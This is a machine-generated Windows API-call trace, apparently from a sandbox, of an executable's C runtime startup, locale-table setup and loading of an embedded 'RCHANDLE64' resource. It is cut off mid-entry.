QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=21695441864) returned 1 [0096.631] GetProcessHeap () returned 0x510000 [0097.170] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0097.170] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0097.171] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0097.171] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0097.171] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0097.171] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0097.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0097.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0097.171] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0097.171] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0097.172] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0097.172] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0097.172] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0097.172] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0097.172] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0097.172] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0097.172] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0097.172] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0097.173] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0097.173] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0097.173] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0097.173] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0097.173] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0097.173] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0097.173] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0097.173] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0097.174] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0097.174] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0097.174] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0097.174] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0097.174] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0097.174] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0097.174] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0097.175] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0097.194] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3bc) returned 0x5270b0 [0097.195] GetCurrentThreadId () returned 0x8ac [0097.195] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x527478 [0097.195] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x800) returned 0x527498 [0097.195] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"absolutetelnet.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x5c691da, hStdError=0x0)) [0097.195] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0097.195] GetFileType (hFile=0x3) returned 0x2 [0097.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0097.196] GetFileType (hFile=0x80) returned 0x3 [0097.196] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0097.196] GetFileType (hFile=0xb) returned 0x2 [0097.196] GetCommandLineW () returned="tdq963ii.exe -accepteula \"absolutetelnet.exe\" -nobanner" [0097.196] GetEnvironmentStringsW () returned 0x527ca0* [0097.197] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xb8c) returned 0x528838 [0097.201] FreeEnvironmentStringsW (penv=0x527ca0) returned 1 [0097.201] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0097.571] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x80) returned 0x527ca0 [0097.575] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa0) returned 0x527d28 [0097.575] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3e) returned 0x524de0 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x6c) returned 0x527dd0 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x6e) returned 0x527e48 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x78) returned 0x51f910 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x62) returned 0x527ec0 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2e) returned 0x527f30 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x48) returned 0x527f68 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x527fb8 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x28) returned 0x527ff0 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1a) returned 0x526a80 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4a) returned 0x528020 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x72) returned 0x51f990 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x528078 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2e) returned 0x5280b0 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1c) returned 0x526aa8 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xd2) returned 0x5280e8 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x7c) returned 0x5281c8 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x36) returned 0x528250 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3a) returned 0x524e28 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x90) returned 0x528290 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x24) returned 0x528328 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x528358 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x36) returned 0x528390 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x48) returned 0x5283d0 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x52) returned 0x528420 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3c) returned 0x524e70 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x18) returned 0x528480 [0097.579] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x82) returned 0x5284a0 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2e) returned 0x528530 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1e) returned 0x526ad0 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2c) returned 0x528568 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x54) returned 0x5285a0 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x52) returned 0x528600 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x2a) returned 0x528660 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3c) returned 0x524eb8 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x54) returned 0x528698 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x24) returned 0x5286f8 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x528728 [0097.580] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x8c) returned 0x528760 [0097.580] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x528838 | out: hHeap=0x510000) returned 1 [0097.786] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x800) returned 0x5287f8 [0097.786] GetLastError () returned 0x0 [0097.787] SetLastError (dwErrCode=0x0) [0097.787] GetLastError () returned 0x0 [0097.787] SetLastError (dwErrCode=0x0) [0097.787] GetLastError () returned 0x0 [0097.787] SetLastError (dwErrCode=0x0) [0097.787] GetACP () returned 0x4e4 [0097.787] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x220) returned 0x529000 [0097.788] GetLastError () returned 0x0 [0097.788] SetLastError (dwErrCode=0x0) [0097.788] IsValidCodePage (CodePage=0x4e4) returned 1 [0097.788] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0097.788] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0097.792] GetLastError () returned 0x0 [0097.792] SetLastError (dwErrCode=0x0) [0097.792] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.796] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0097.796] GetLastError () returned 0x0 [0097.796] SetLastError (dwErrCode=0x0) [0097.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.796] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.797] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0097.797] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0097.797] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿJ\x90Æ\x05äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0097.797] GetLastError () returned 0x0 [0097.797] SetLastError (dwErrCode=0x0) [0097.797] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.797] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.797] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0097.797] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0097.797] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿJ\x90Æ\x05äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0097.798] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x80) returned 0x529228 [0098.021] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0098.022] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0098.022] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x529228) returned 0x80 [0098.022] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0098.022] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0098.022] GetCurrentProcess () returned 0xffffffff [0098.023] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0098.023] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0098.023] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0098.025] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0098.025] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0098.025] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0098.025] 